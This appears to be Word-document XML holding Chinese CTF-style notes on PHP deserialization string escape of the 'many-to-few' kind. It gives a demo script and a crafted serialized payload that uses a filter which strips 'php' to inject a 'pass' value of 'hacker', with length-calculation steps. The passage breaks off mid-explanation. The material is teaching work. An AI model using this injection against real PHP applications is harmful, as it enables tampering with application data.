    <w:p w14:paraId="079732A8" w14:textId="1CE28810" w:rsidR="004835FF" w:rsidRDefault="004835FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398A83E9" wp14:editId="2AFA7D38">
            <wp:extent cx="5274310" cy="1318260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2034486605"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86605" name="图片 1" descr="图片包含 图形用户界面&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1318260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF8F7B" w14:textId="77777777" w:rsidR="00BD3520" w:rsidRDefault="00BD3520" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D5E009" w14:textId="02D5A876" w:rsidR="009665BE" w:rsidRDefault="009665BE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多变少</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F4287" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099AB7A1" w14:textId="5CBBC486" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CC4F3" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C8813" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多变少题目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD2D07" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>function str_rep($string){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F151D38" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return preg_replace( '/php|test/','', $string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E9F3F" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24000CAE" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F32C0E" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class A{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEDDB71" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public $name='aaaa';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F086D64" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public $pass='123456';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31599289" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54575953" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360AB0E6" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先构造尾部字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53314909" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// ";s:4:"pass";s:6:"hacker";}";}  payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分：这是最终要反序列化识别出来的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBC42D" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// ";s:4:"pass";s:2:"222    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作废部分：这部分是需要被吃的，不过这部分可以计算，比如长度是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者不是整倍数也可以直接改字符串使其长度是变化长度的整倍数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831A706" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变化：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-&gt;0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4-&gt;0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的倍数，然后构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 21 / 3 = 7,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E15F41" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$payload = 'O:1:"A":2:{s:4:"name";s:21:"phpphpphpphpphpphpphp";s:4:"pass";s:3:"221";s:4:"pass";s:6:"hacker";}"';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581024CB" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6053F6" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$payload=str_rep($payload);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50820ADD" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>echo $payload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E79BED" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B558C31" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF01D61" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$o=unserialize($payload);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3C32A" w14:textId="77777777" w:rsidR="0052554B" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo $o-&gt;pass;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF319C" w14:textId="5683138C" w:rsidR="00844067" w:rsidRDefault="0052554B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4B4B1" w14:textId="7477B673" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779EE829" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA37470" w14:textId="49DD854B" w:rsidR="00844067" w:rsidRDefault="002038EB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成一个看起来正常的序列化字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B9E5B" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3635BA31" w14:textId="2D425C2C" w:rsidR="00844067" w:rsidRDefault="002038EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002038EB">
        <w:t>O:1:"A":2:{s:4:"name";s:2:"12";s:4:"pass";s:2:"21";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3713C9" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F828FB" w14:textId="353ED284" w:rsidR="00844067" w:rsidRDefault="002038EB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00DF0709">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算被吃掉部分字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC5CC1" w14:textId="77777777" w:rsidR="00844067" w:rsidRDefault="00844067" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B31BC7" w14:textId="07DA27C4" w:rsidR="00DF0709" w:rsidRDefault="00DF0709" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如这部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FE4EE6" w14:textId="05276B9F" w:rsidR="00DF0709" w:rsidRDefault="00DF0709" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002038EB">
        <w:t>O:1:"A":2:{s:4:"name";s:2:"12</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:"21</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002038EB">
        <w:t>";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F429295" w14:textId="77777777" w:rsidR="00DF0709" w:rsidRPr="00DF0709" w:rsidRDefault="00DF0709" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01840F83" w14:textId="4253BB67" w:rsidR="009E52AF" w:rsidRPr="009E52AF" w:rsidRDefault="009E52AF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:3:"212</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57E9FA" w14:textId="57E183A4" w:rsidR="00DF0709" w:rsidRDefault="00E22E2D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是将被吃掉的部分，计算长度是</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00A4DE" w14:textId="77777777" w:rsidR="00DF0709" w:rsidRDefault="00DF0709" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0F1315" w14:textId="4DE5E4DD" w:rsidR="00E22E2D" w:rsidRDefault="00E22E2D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变化：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4-&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即找</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的倍数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此处假设我们选择构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的倍数，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 21 / 3 = 7,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则写</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22E2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2390E4" w14:textId="77777777" w:rsidR="00E22E2D" w:rsidRDefault="00E22E2D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B69123E" w14:textId="12106D2B" w:rsidR="00B061E9" w:rsidRPr="009E52AF" w:rsidRDefault="00B061E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>注意，此处如果长度是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，但是遇到的题目是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>-&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>位移为</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>的整倍数，也不用太担心。“多变少”题型我们</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>可以随意控制被吃的字符串长度</w:t>
      </w:r>
      <w:r w:rsidR="0005429E" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>（反正会被吃掉</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，甚至不用计算这个</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>的长度对不对</w:t>
      </w:r>
      <w:r w:rsidR="0005429E" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，比如是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:"22</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>被吃的</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>长度，那可以改字符串长度和字符串是</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>长度的</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:2:"2</w:t>
      </w:r>
      <w:r w:rsidR="009E52AF" w:rsidRPr="009E52AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009E52AF">
        <w:rPr>
